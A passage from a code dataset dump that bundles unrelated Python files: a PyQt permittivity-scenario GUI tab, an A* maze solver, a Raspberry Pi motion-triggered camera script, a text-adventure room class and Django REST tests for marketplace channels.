legend',self)\n label.setToolTip('The legend will be used to describe the results in the plot')\n form.addRow(label, self.legend_le)\n\n #\n # Final buttons\n #\n hbox = QHBoxLayout()\n self.pushButton1 = QPushButton('Add another scenario')\n self.pushButton1.setToolTip('Use another scenario to calculate the effect of changing the material on the absorption and permittivity')\n self.pushButton1.clicked.connect(self.pushButton1Clicked)\n hbox.addWidget(self.pushButton1)\n self.pushButton3 = QPushButton('Delete this scenario')\n self.pushButton3.setToolTip('Delete the current scenario')\n self.pushButton3.clicked.connect(self.pushButton3Clicked)\n hbox.addWidget(self.pushButton3)\n form.addRow(hbox)\n vbox.addLayout(form)\n # finalise the layout\n self.setLayout(vbox)\n # sort out greying of boxes\n self.change_greyed_out()\n\n def pushButton1Clicked(self):\n # Add another scenario\n debugger.print('Button 1 pressed')\n self.notebook.addScenario(copyFromIndex=self.scenarioIndex)\n\n def pushButton3Clicked(self):\n # Delete a scenario\n debugger.print('Button 3 pressed')\n self.notebook.deleteScenario(self.scenarioIndex)\n\n def crystal_density(self):\n if not self.reader:\n return 1.0\n volume = self.reader.volume\n mass = 0.0\n for m in self.reader.masses:\n mass += m\n density = mass / (avogadro_si * volume * 1.0e-24)\n return density\n \n\n def on_h_sb_changed(self,value):\n debugger.print('on_h_sb_changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Unique direction - h'] = value\n\n def on_k_sb_changed(self,value):\n debugger.print('on_k_sb_changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Unique direction - k'] = value\n\n def on_l_sb_changed(self,value):\n debugger.print('on_l_sb_changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Unique direction - l'] = value\n\n def on_shape_cb_activated(self,index):\n debugger.print('on shape cb activated', index)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Particle shape'] = self.shapes[index]\n if self.settings['Particle shape'] == 'Sphere':\n self.settings['Unique direction - h'] = 0\n self.settings['Unique direction - k'] = 0\n self.settings['Unique direction - l'] = 0\n self.change_greyed_out()\n\n def on_methods_cb_activated(self,index):\n debugger.print('on methods cb activated', index)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Effective medium method'] = self.methods[index]\n if self.settings['Effective medium method'] == 'Mie':\n self.settings['Particle shape'] = 'Sphere'\n elif self.settings['Effective medium method'] == 'Anisotropic-Mie':\n self.settings['Particle shape'] = 'Sphere'\n elif self.settings['Effective medium method'] == 'Maxwell-Garnett':\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n elif self.settings['Effective medium method'] == 'Bruggeman':\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n elif self.settings['Effective medium method'] == 'Averaged Permittivity':\n self.settings['Particle size(mu)'] = 0.0001\n self.settings['Particle size distribution sigma(mu)'] = 0.0\n self.change_greyed_out()\n\n def on_mf_sb_changed(self,value):\n debugger.print('on mass fraction line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Mass or volume fraction'] = 'mass'\n self.settings['Mass fraction'] = value/100.0\n self.update_vf_sb()\n\n def update_vf_sb(self):\n mf1 = self.settings['Mass fraction']\n mf2 = 1.0 - mf1\n rho1 = self.crystal_density()\n rho2 = self.settings['Matrix density']\n vf1 = ( 1.0 - self.settings['Bubble volume fraction'] ) * (mf1/mf2)*(rho2/rho1) / ( 1 + (mf1/mf2)*(rho2/rho1))\n# vf1 = 1.0 / ( 1.0 + mf2/mf1 * (rho1/rho2) )\n self.settings['Volume fraction'] = vf1\n self.vf_sb.blockSignals(True)\n self.vf_sb.setValue(100.0*vf1)\n self.vf_sb.blockSignals(False)\n self.bubble_vf_sb.setRange(0.0, 100.0*(1.0-self.settings['Volume fraction']))\n self.vf_sb.setRange(0.0, 100.0*(1.0-self.settings['Bubble volume fraction']))\n debugger.print('Update_vf_sb')\n debugger.print('rho 1', rho1)\n debugger.print('rho 2', rho2)\n debugger.print('vf 1 ', vf1)\n \n def on_aoverb_sb_changed(self,value):\n debugger.print('on_aoverb_le_changed',value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Ellipsoid a/b'] = value\n\n def on_legend_le_changed(self,text):\n debugger.print('on legend change', text)\n self.dirty = True\n self.settings['Legend'] = text\n\n def on_sigma_sb_changed(self,value):\n debugger.print('on sigma line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Particle size distribution sigma(mu)'] = value\n\n def on_size_sb_changed(self,value):\n debugger.print('on size line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Particle size(mu)'] = value\n\n def on_vf_sb_changed(self,value):\n debugger.print('on volume fraction line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.settings['Mass or volume fraction'] = 'volume'\n self.settings['Volume fraction'] = value/100.0\n self.update_mf_sb()\n\n def update_mf_sb(self):\n vf1 = self.settings['Volume fraction']\n vf2 = 1.0 - vf1 - self.settings['Bubble volume fraction']\n rho1 = self.crystal_density()\n rho2 = self.settings['Matrix density']\n # mf1 = 1.0 / ( 1.0 + (vf2/vf1) * (rho2/rho1) )\n mf1 = rho1*vf1 / ( rho1*vf1 + rho2*vf2 )\n self.settings['Mass fraction'] = mf1\n self.mf_sb.blockSignals(True)\n self.mf_sb.setValue(100.0*mf1)\n self.mf_sb.blockSignals(False)\n debugger.print('Update_mf_sb')\n debugger.print('rho 1', rho1)\n debugger.print('rho 2', rho2)\n debugger.print('mf 1 ', mf1)\n\n def on_matrix_cb_activated(self,index):\n debugger.print('on matrix combobox activated', index)\n debugger.print('on matrix combobox activated', self.matrix_cb.currentText())\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n matrix = self.matrix_cb.currentText()\n self.matrix_cb.blockSignals(True)\n self.density_sb.blockSignals(True)\n self.permittivity_sb.blockSignals(True)\n self.settings['Matrix'] = matrix\n self.settings['Matrix density'] = support_matrix_db[matrix][0]\n self.settings['Matrix permittivity'] = support_matrix_db[matrix][1]\n self.density_sb.setValue(self.settings['Matrix density'])\n self.permittivity_sb.setValue(self.settings['Matrix permittivity'])\n # volume fraction takes precedence\n if self.settings['Mass or volume fraction'] == 'volume':\n self.update_mf_sb()\n self.update_vf_sb()\n else:\n self.update_vf_sb()\n self.update_mf_sb()\n self.matrix_cb.blockSignals(False)\n self.density_sb.blockSignals(False)\n self.permittivity_sb.blockSignals(False)\n\n def on_density_sb_changed(self,value):\n self.settings['Matrix density'] = value\n # volume fraction taked precedence\n if self.settings['Mass or volume fraction'] == 'volume':\n self.update_mf_sb()\n self.update_vf_sb()\n else:\n self.update_vf_sb()\n self.update_mf_sb()\n debugger.print('on density line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_bubble_vf_sb_changed(self,value):\n self.settings['Bubble volume fraction'] = value/100.0\n if self.settings['Mass or volume fraction'] == 'volume':\n self.update_mf_sb()\n else:\n self.update_vf_sb()\n debugger.print('on bubble volume fraction changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_bubble_radius_sb_changed(self,value):\n self.settings['Bubble radius'] = value\n debugger.print('on permittivity line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_permittivity_sb_changed(self,value):\n self.settings['Matrix permittivity'] = value\n debugger.print('on permittivity line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_atr_index_sb_changed(self,value):\n self.settings['ATR material refractive index'] = value\n debugger.print('on atr index line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_atr_incident_ang_sb_changed(self,value):\n self.settings['ATR theta'] = value\n debugger.print('on atr incident angle line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def on_atr_spolfrac_sb_changed(self,value):\n self.settings['ATR S polarisation fraction'] = value\n debugger.print('on atr spolfraction line edit changed', value)\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n\n def set_reader(self,reader):\n self.dirty = True\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n self.reader = reader\n\n def change_greyed_out(self):\n # Have a look through the settings and see if we need to grey anything out\n method = self.settings['Effective medium method']\n if method == 'Mie' or method == 'Anisotropic-Mie':\n self.size_sb.setEnabled(True)\n self.sigma_sb.setEnabled(True)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(False)\n self.settings['Particle shape'] = 'Sphere'\n self.shape_cb.setEnabled(True)\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n if index >=0:\n self.shape_cb.model().item(index).setEnabled(True)\n self.shape_cb.setCurrentIndex(index)\n else:\n print('Method index was not 0',self.settings['Particle shape'])\n elif method == 'Averaged Permittivity':\n self.size_sb.setEnabled(False)\n self.sigma_sb.setEnabled(False)\n self.settings['Particle shape'] = 'Sphere'\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n if index >=0:\n self.shape_cb.model().item(index).setEnabled(True)\n self.shape_cb.setCurrentIndex(index)\n self.shape_cb.setEnabled(False)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(False)\n elif method == 'Maxwell-Garnett' or method == 'Bruggeman':\n self.size_sb.setEnabled(True)\n self.sigma_sb.setEnabled(False)\n self.shape_cb.setEnabled(True)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(True)\n else:\n self.size_sb.setEnabled(False)\n self.sigma_sb.setEnabled(False)\n self.shape_cb.setEnabled(True)\n for i,shape in enumerate(self.shapes):\n self.shape_cb.model().item(i).setEnabled(True)\n # deal with shapes\n if self.settings['Particle shape'] == 'Ellipsoid':\n self.h_sb.setEnabled(True)\n self.k_sb.setEnabled(True)\n self.l_sb.setEnabled(True)\n self.hkl_label.setText('Unique direction [abc]')\n self.aoverb_sb.setEnabled(True)\n elif self.settings['Particle shape'] == 'Plate':\n self.h_sb.setEnabled(True)\n self.k_sb.setEnabled(True)\n self.l_sb.setEnabled(True)\n self.hkl_label.setText('Unique direction (hkl)')\n self.aoverb_sb.setEnabled(False)\n elif self.settings['Particle shape'] == 'Needle':\n self.h_sb.setEnabled(True)\n self.k_sb.setEnabled(True)\n self.l_sb.setEnabled(True)\n self.hkl_label.setText('Unique direction [abc]')\n self.aoverb_sb.setEnabled(False)\n elif self.settings['Particle shape'] == 'Sphere':\n self.h_sb.setEnabled(False)\n self.k_sb.setEnabled(False)\n self.l_sb.setEnabled(False)\n self.aoverb_sb.setEnabled(False)\n else:\n print('ScenarioTab: Shape not recognised', self.settings['Particle shape'])\n \n def setScenarioIndex(self,index):\n self.scenarioIndex = index\n text = self.legend_le.text()\n if text == 'Scenario legend':\n self.legend_le.setText('Scenario '+str(index + 1))\n return\n\n def print_settings(self):\n print('#')\n print('# Scenario tab')\n print('#')\n print('tab = self.notebook.scenarios')\n for key in self.settings:\n print(key, self.settings[key]) \n \n def refresh(self,force=False):\n if not self.dirty and not force:\n debugger.print('refresh aborted', self.dirty,force)\n return\n debugger.print('refresh', force)\n # Tell the main notebook that we need to recalculate any plot\n self.notebook.plottingCalculationRequired = True\n self.notebook.fittingCalculationRequired = True\n # First see if we can get the reader from the mainTab\n self.reader = self.notebook.mainTab.reader\n #\n # Block signals during refresh\n # \n for w in self.findChildren(QWidget):\n w.blockSignals(True)\n # use the settings values to initialise the widgets\n index = self.matrix_cb.findText(self.settings['Matrix'], Qt.MatchFixedString)\n self.matrix_cb.setCurrentIndex(index)\n self.density_sb.setValue(self.settings['Matrix density'])\n self.permittivity_sb.setValue(self.settings['Matrix permittivity'])\n self.bubble_vf_sb.setValue(100*self.settings['Bubble volume fraction'])\n self.bubble_radius_sb.setValue(self.settings['Bubble radius'])\n if self.settings['Mass or volume fraction'] == 'volume':\n # volume fraction takes precedence\n self.update_mf_sb()\n self.update_vf_sb()\n else:\n # mass fraction takes precedence\n self.update_vf_sb()\n self.update_mf_sb()\n #\n index = self.methods_cb.findText(self.settings['Effective medium method'], Qt.MatchFixedString)\n self.methods_cb.setCurrentIndex(index)\n self.size_sb.setValue(self.settings['Particle size(mu)'])\n self.sigma_sb.setValue(self.settings['Particle size distribution sigma(mu)'])\n index = self.shape_cb.findText(self.settings['Particle shape'], Qt.MatchFixedString)\n self.shape_cb.setCurrentIndex(index)\n self.h_sb.setValue(self.settings['Unique direction - h'])\n self.k_sb.setValue(self.settings['Unique direction - k'])\n self.l_sb.setValue(self.settings['Unique direction - l'])\n self.aoverb_sb.setValue(self.settings['Ellipsoid a/b'])\n self.legend_le.setText(self.settings['Legend'])\n self.change_greyed_out()\n #\n # Unblock signals after refresh\n # \n for w in self.findChildren(QWidget):\n w.blockSignals(False)\n self.dirty = False\n return\n","sub_path":"Python/GUI/ScenarioTab.py","file_name":"ScenarioTab.py","file_ext":"py","file_size_in_byte":32863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"45559702","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\n\n\ndef clfile(filename):\n n = raw_input('''\n c:creat a new file\n o:overwrite this file\n ''')\n if n == 'c':\n f = open(filename, 'r')\n a = filename + '1'\n l = open(a, 'w')\n m = map(lambda x: x.strip(), f)\n for i in m:\n l.write(i)\n l.write(os.linesep)\n l.close()\n if n == 'o':\n f = open(filename, 'r')\n m = map(lambda x: x.strip(), f)\n f.close()\n f = open(filename, 'w')\n for i in m:\n f.write(i)\n f.write(os.linesep)\n f.close()\n\n\nif __name__ == '__main__':\n clfile('10.eg')\n","sub_path":"11/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"215351742","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@FileName: Maze.py\r\n@Abstract: Maze class\r\n@Time: 2021/03/11 08:05:33\r\n@Requirements: \r\n@Author: WangZy ntu.wangzy@gmail.com\r\n@Version: -\r\n'''\r\n\r\nimport random\r\nfrom typing import NamedTuple\r\nfrom enum import Enum\r\nfrom math import sqrt\r\nfrom A_star import manhattan_distance, astar, node_to_path, Node\r\n\r\nclass Cell(str, Enum):\r\n EMPTY = ' '\r\n BLOCKED = 'X'\r\n START = 'S'\r\n GOAL = 'G'\r\n PATH = '@'\r\n\r\nclass MazeLocation(NamedTuple):\r\n row: int\r\n column: int\r\n\r\nclass Maze:\r\n def __init__(self, rows=10, columns=10, sparseness=0.2, start=MazeLocation(0, 0), goal=MazeLocation(9, 9)):\r\n # initialize instance variables\r\n self._rows = rows\r\n self._columns = columns\r\n self.start = start\r\n self.goal = goal\r\n self._grid = [[Cell.EMPTY for c in range(columns)] for r in range(rows)]\r\n # fill blocked cells\r\n self._randomly_fill(rows, columns, sparseness)\r\n # fill the start and goal\r\n self._grid[start.row][start.column] = Cell.START\r\n self._grid[goal.row][goal.column] = Cell.GOAL\r\n \r\n def _randomly_fill(self, rows, columns, sparseness):\r\n for row in range(rows):\r\n for column in range(columns):\r\n if random.uniform(0, 1.0) < sparseness:\r\n self._grid[row][column] = Cell.BLOCKED\r\n \r\n #print\r\n def __str__(self):\r\n output = ''\r\n for row in self._grid:\r\n output += ''.join([c.value for c in row]) + '\\n'\r\n return output\r\n\r\n def goal_test(self, location):\r\n return location == self.goal\r\n\r\n def successors(self, location):\r\n locations = []\r\n if location.row + 1 < self._rows and self._grid[location.row+1][location.column] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row+1, location.column))\r\n if location.row - 1 >= 0 and self._grid[location.row-1][location.column] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row-1, location.column))\r\n if location.column - 1 >= 0 and self._grid[location.row][location.column-1] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row, location.column-1))\r\n if location.column + 1 < self._columns and self._grid[location.row][location.column+1] != Cell.BLOCKED:\r\n locations.append(MazeLocation(location.row, location.column+1))\r\n return locations\r\n \r\n def mark(self, path):\r\n for maze_location in path:\r\n self._grid[maze_location.row][maze_location.column] = Cell.PATH\r\n self._grid[self.start.row][self.start.column] = Cell.START\r\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\r\n \r\n def clear(self, path):\r\n for maze_location in path:\r\n self._grid[maze_location.row][maze_location.column] = Cell.EMPTY\r\n self._grid[self.start.row][self.start.column] = Cell.START\r\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\r\n\r\n#test\r\nm = Maze()\r\ndistance = manhattan_distance(m.goal)\r\nsolution = astar(m.start, m.goal_test, m.successors,distance)\r\nprint(solution.state)\r\nif solution is None:\r\n print('No Solution')\r\nelse:\r\n path = node_to_path(solution)\r\n m.mark(path)\r\n print(m)\r\n","sub_path":"A-Star search_python/Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"398466858","text":"import RPi.GPIO as GPIO\nimport time\nimport picamera\n\n# Setup PIR sensor\n#-----------------\n\niPIN_PIR1 = 7\niPIN_PIR2 = 23\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD) # identify by pin numbers (as opposed to GPIO numbers)\n\nGPIO.setup(iPIN_PIR1, GPIO.IN)\nGPIO.setup(iPIN_PIR2, GPIO.IN)\n\nstart_time = time.time()\nprev_state = False\ncurr_state = False\n\n# Setup camera\n#-------------\ncam = picamera.PiCamera()\ncam.resolution = (1296, 972)\n#cam.framerate = 25\n#time.sleep(2) #wait for automatic gain to settle\n#cam.shutter_speed = cam.exposure_speed\n#cam.exposure_mode = 'off'\ncam.hflip = True\ncam.vflip = True\ncam.capture('pirCamera_testimage.jpg')\n\n# Setup filestamping\n#-------------------\nt = time.localtime()\ntformat = '%Y-%m-%d-%H-%M-%S'\ntimestamp = 'emptyinit'\n\n\nprint(\"PIR + Camera test (ctrl-c to exit)\")\n\ntry:\n while True:\n time.sleep(0.5)\n prev_state = curr_state\n curr_state = GPIO.input(iPIN_PIR1) or GPIO.input(iPIN_PIR2)\n #print(\"state is \",curr_state)\n if curr_state != prev_state:\n new_state = \"HIGH\" if curr_state else \"LOW\"\n #print(\"GPIO pin %s is %s\" % (iPIN_PIR, new_state))\n if curr_state:\n #cam.start_preview()\n t = time.localtime()\n timestamp = time.strftime(tformat, t)\n cam.capture('movement-%s.jpg'%timestamp)\n print(\"Motion detected at %s\" % timestamp)\n else:\n #cam.stop_preview()\n print(\"No motion, time in HIGH state was %s s\" % (time.time()-start_time))\n start_time = time.time()\n\nexcept KeyboardInterrupt:\n print(\" Quit\")\n #Reset GPIO settings\n GPIO.cleanup()\n","sub_path":"02_pirCamera.py","file_name":"02_pirCamera.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"429413007","text":"from roomTile import RoomTile\nfrom functools import partial\n\n# author: Jason Watson\n\n# unique player actions in this room:\n# * sit on couch\n# * lie on couch\n# * sit on rocking chair\n# * put cassette in tape recorder: check inventory for cassette tape\n# * play recorder: check whether cassette tape is in recorder\n# * remove cassette from tape recorder: add cassette tape to inventory\n# * open/close door\n# * flip on/off light switch\n\n# Features in this room:\n# * flashlight required to see any features in this room. Still need to figure out how to make this work.\n# * light switch that doesn't work\n# * couch and coffee table. A tape recorder lies on the coffee table.\n\n\nclass LivingRoom(RoomTile):\n def __init__(self, x, y):\n super().__init__(x, y)\n self.x = x\n self.y = y\n self.visited = False\n self.name = \"Living Room\"\n self.light_on = False\n self.door_is_open = True\n self.recorder_with_tape = False\n self.sitting_in_rocking_chair = False\n self.sitting_on_couch = False\n self.lying_on_couch = False\n self.items = [self.recorder]\n\n # actions available in living room\n\n def turn_on_light(self):\n if not self.lying_on_couch and not self.sitting_on_couch and not self.sitting_in_rocking_chair:\n self.light_on = True\n print(\"\\nYou flip the light switch. Disappointed, it doesn't do anything!\\n\")\n else:\n print(\"\\nYou will need to get up if you want to do that!\\n\")\n\n def turn_off_light(self):\n if not self.lying_on_couch and not self.sitting_on_couch and not self.sitting_in_rocking_chair:\n self.light_on = False\n print(\"\\nDoesn't do anything.\\n\")\n else:\n print(\"\\nYou will need to get up if you want to do that!\\n\")\n\n @staticmethod\n def look_at_rocking_chair():\n print(\"\\nIt is a rocking chair. Thankfully, it is not moving now.\\n\")\n\n def sit_in_rocking_chair(self):\n self.sitting_in_rocking_chair = True\n print(\"\\nYou sit down. It is as comfortable as you would expect a wooden rocking chair to be.\\n\")\n\n def look_at_door(self):\n if self.door_is_open:\n print(\"\\nThe door is open.\\n\")\n elif not self.door_is_open:\n print(\"\\nThe door is closed. It is a normal looking door. It is unlocked.\\n\")\n\n @staticmethod\n def look_at_couch():\n print(\"\\nIt is an old and worn couch.\\n\")\n\n def sit_on_couch(self):\n self.sitting_on_couch = True\n print(\"\\nYou sit down. It is not comfortable at all. Still, it feels good to be off your feet!\\n\")\n\n def lie_on_couch(self):\n self.lying_on_couch = True\n print(\"\\nYou lie down. It is not comfortable at all. You begin to doze.\\n\")\n\n def get_up_from_chair(self):\n self.sitting_in_rocking_chair = False\n print(\"\\nYou stand up.\\n\")\n\n def get_up_from_couch(self):\n self.sitting_on_couch = False\n print(\"\\nYou stand up.\\n\")\n\n @staticmethod\n def look_at_table():\n print(\"\\nIt is a table. There is a tape recorder on top of it.\\n\")\n\n @staticmethod\n def look_at_tv():\n print(\"\\nIt is an old TV from the 1950s. It looks like it hasn't been in use for decades.\\n\")\n\n @staticmethod\n def turn_on_tv():\n print(\"\\nYou turn the TV on. It doesn't do anything.\\n\")\n\n @staticmethod\n def look_at_tv_stand():\n print(\"\\nIt's just a small table. There is nothing else on or around it of interest.\\n\")\n\n def play_recorder(self):\n if self.recorder.tape_in_recorder:\n self.recorder.play_recorder()\n else:\n print(\"You will need to find a cassette tape.\")\n\n def look_at_recorder(self):\n self.recorder.description()\n\n # remove cassette from inventory. Put cassette into tape recorder.\n # check inventory for cassette tape\n def put_cassette_in_recorder(self, item, player1):\n self.recorder.add_tape(item, player1)\n\n # add cassette to inventory. Remove cassette from tape recorder.\n def take_cassette_from_recorder(self, item, player1):\n self.recorder.remove_tape(item, player1)\n\n def open_door(self):\n if self.door_is_open:\n print(\"\\nThe door is already open!\\n\")\n elif not self.door_is_open:\n self.door_is_open = True\n print(\"\\nYou open the door.\\n\")\n\n def close_door(self):\n if self.door_is_open:\n self.door_is_open = False\n print(\"\\nYou close the door.\\n\")\n elif not self.door_is_open:\n print(\"\\nThe door is already closed!\\n\")\n\n def is_door_open(self):\n if self.door_is_open:\n print(\"\\nThe door to the east is open.\\n\")\n elif not self.door_is_open:\n print(\"\\nThe door to the east is closed.\\n\")\n\n def print_items_in_room(self):\n num_items = len(self.items)\n print(f\"\\nThere are {num_items} items in this room: \\n\")\n for x in range(len(self.items)):\n print(self.items[x])\n print(\"\\n\")\n\n @staticmethod\n def exits_from_room():\n print(\"\\nThere is a door to the east and an open entrance to the south.\\n\")\n\n # public method\n # call method when room is loaded. i.e. darkHall.room_description() when room is loaded.\n def room_description(self, player1):\n # first you will need to determine if the player already visited this room.\n # if visited, then print short description.\n # if not visited, then call long_room_description\n # both long and short description must check to see if there are items in the room.\n # print out the items in the room\n # first check to see if there are items in the room\n # you will need to eventually implement flashlight on method here.\n if self.visited:\n if len(self.items) == 0:\n print(\"\\n**********Living Room**********\\n\"\n \"\\nIt looks like a living room. There is a rocking chair in the corner, facing a boarded up\\n\"\n \"window. There is an old couch in the center of the room, and a coffee table in front of the\\n\"\n \"couch. There is what looks like a recorder on the table. Under the couch and coffee table is\\n\"\n \"a large woolen rug that has seen better days.\\n\"\n \"There is a light switch to the right of the doorway. There is an old TV leaning against\\n\"\n \"the wall on a TV stand.\\n\")\n self.is_door_open()\n self.exits_from_room()\n else:\n print(\"\\n**********Living Room**********\\n\"\n \"\\nIt looks like a living room. There is a rocking chair in the corner, facing a boarded up\\n\"\n \"window. There is an old couch in the center of the room, and a coffee table in front of the\\n\"\n \"couch. Under the couch and coffee table is a large woolen rug that has seen better days.\\n\"\n \"There is a light switch to the right of the doorway. There is an old TV leaning against\\n\"\n \"the wall on a TV stand.\\n\")\n self.is_door_open()\n self.print_items_in_room()\n self.exits_from_room()\n\n else:\n self.visited = True\n if len(self.items) == 0:\n self.long_room_description()\n self.is_door_open()\n self.exits_from_room()\n else:\n self.long_room_description()\n self.is_door_open()\n self.print_items_in_room()\n self.exits_from_room()\n\n def long_room_description(self):\n print(\"\\n**********Living Room**********\\n\"\n \"\\nYou are in a living room. It is a dark room. You can see a rocking chair creaking \\n\"\n \"and rocking back and forth in the corner of the room, facing a boarded \\n\"\n \"up window. The creaking quickly stops when the player notices it. There \\n\"\n \"is an old couch in the center of the room, and a coffee table in \\n\"\n \"front of the couch. Under the couch and coffee table is a large woolen rug that has seen better\\n\"\n \"days. There is a light switch to the right of the doorway. The rocking chair is\\n\"\n \"in the corner of the room. There is also an old TV set that looks like it's from the 1950s.\\n\"\n \"It leans against the wall on a TV stand.\\n\")\n\n def available_actions(self, player1, command):\n\n # Brendan's actions_dict idea.\n actions_dict = {\n 'turn on light': self.turn_on_light,\n 'turn off light': self.turn_off_light,\n 'open door': self.open_door,\n 'close door': self.close_door,\n 'look at recorder': self.look_at_recorder,\n 'look at table': self.look_at_table,\n 'look at chair': self.look_at_rocking_chair,\n 'sit in chair': self.sit_in_rocking_chair,\n 'look at couch': self.look_at_couch,\n 'sit on couch': self.sit_on_couch,\n 'lie on couch': self.lie_on_couch,\n 'get up from chair': self.get_up_from_chair,\n 'get up from couch': self.get_up_from_couch,\n 'look at tv': self.look_at_tv,\n 'turn on tv': self.turn_on_tv,\n 'look at tv stand': self.look_at_tv_stand,\n 'look at door': self.look_at_door,\n 'put cassette tape in recorder': partial(self.put_cassette_in_recorder, self.tape, player1),\n 'take cassette tape from recorder': partial(self.take_cassette_from_recorder, self.tape, player1),\n 'play recorder': self.play_recorder,\n }\n\n if command in actions_dict.keys():\n actions_dict[command]()\n elif command == \"go east\":\n if self.door_is_open:\n player1.move_east()\n elif not self.door_is_open:\n print(\"\\nYou will need to open the door!\\n\")\n self.room_description(player1)\n else:\n super().available_actions(player1, command)\n","sub_path":"CS 467/Capstone Project/livingRoom.py","file_name":"livingRoom.py","file_ext":"py","file_size_in_byte":10189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"106127195","text":"from django.core.urlresolvers import reverse\nfrom model_mommy import mommy\nfrom rest_framework.test import APITestCase\n\n\nclass ChannelBaseTest(APITestCase):\n def setUp(self):\n self.channel = mommy.make(\n 'Channel',\n name='walmart'\n )\n\n\nclass ChannelListAPITest(ChannelBaseTest):\n def setUp(self):\n super().setUp()\n self.url_list = reverse('channel-list')\n\n def test_check_channel_on_list(self):\n response = self.client.get(self.url_list)\n results = response.data.get('results')\n channel_dict = {'name': 'walmart', 'slug': 'walmart'}\n self.assertIn(channel_dict, results)\n self.assertEqual(len(results), 1)\n\n def test_paginated_channel_list(self):\n mommy.make('Channel', name='teste', _quantity=100)\n response = self.client.get(self.url_list)\n results = response.data.get('results')\n self.assertEqual(len(results), 50)\n\n def test_invalid_post_method(self):\n data = {\n 'name': 'Walmart'\n }\n response = self.client.post(self.url_list, data)\n error_msg = response.data.get('detail')\n self.assertEqual(405, response.status_code)\n self.assertEqual('Method \"POST\" not allowed.', error_msg)\n\n\nclass ChannelDetailAPITest(ChannelBaseTest):\n def setUp(self):\n super().setUp()\n self.book = mommy.make(\n 'Category',\n name='Books',\n channel=self.channel\n )\n self.url_detail = reverse('channel-detail', kwargs={'slug': self.channel.slug})\n\n def test_check_fields(self):\n response = self.client.get(self.url_detail)\n data = response.data\n self.assertIn('slug', data)\n self.assertIn('name', data)\n self.assertIn('categories', data)\n\n def test_check_values_received(self):\n response = self.client.get(self.url_detail)\n data = response.data\n channel = self.channel\n self.assertEqual(channel.slug, data.get('slug'))\n self.assertEqual(channel.name, data.get('name'))\n self.assertEqual(channel.categories.all().count(), len(data.get('categories')))\n\n def test_invalid_put_method(self):\n data = {\n 'name': 'Walmart updated'\n }\n response = self.client.put(self.url_detail, data)\n error_msg = response.data.get('detail')\n self.assertEqual(405, response.status_code)\n self.assertEqual('Method \"PUT\" not allowed.', error_msg)\n\n def test_check_channel_categories(self):\n response = self.client.get(self.url_detail)\n data = response.data\n for item in self.channel.categories.values('name', 'slug'):\n self.assertIn(item, data.get('categories'))\n","sub_path":"marketplaces/tests/api/test_channel.py","file_name":"test_channel.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78828555","text":"from collections import namedtuple\n\n\nclass UCHourHistogram:\n # h ranges from h0 to h3,the category of price\n def __init__(self, h, dict):\n self.h = h\n self.t = 0.0 # 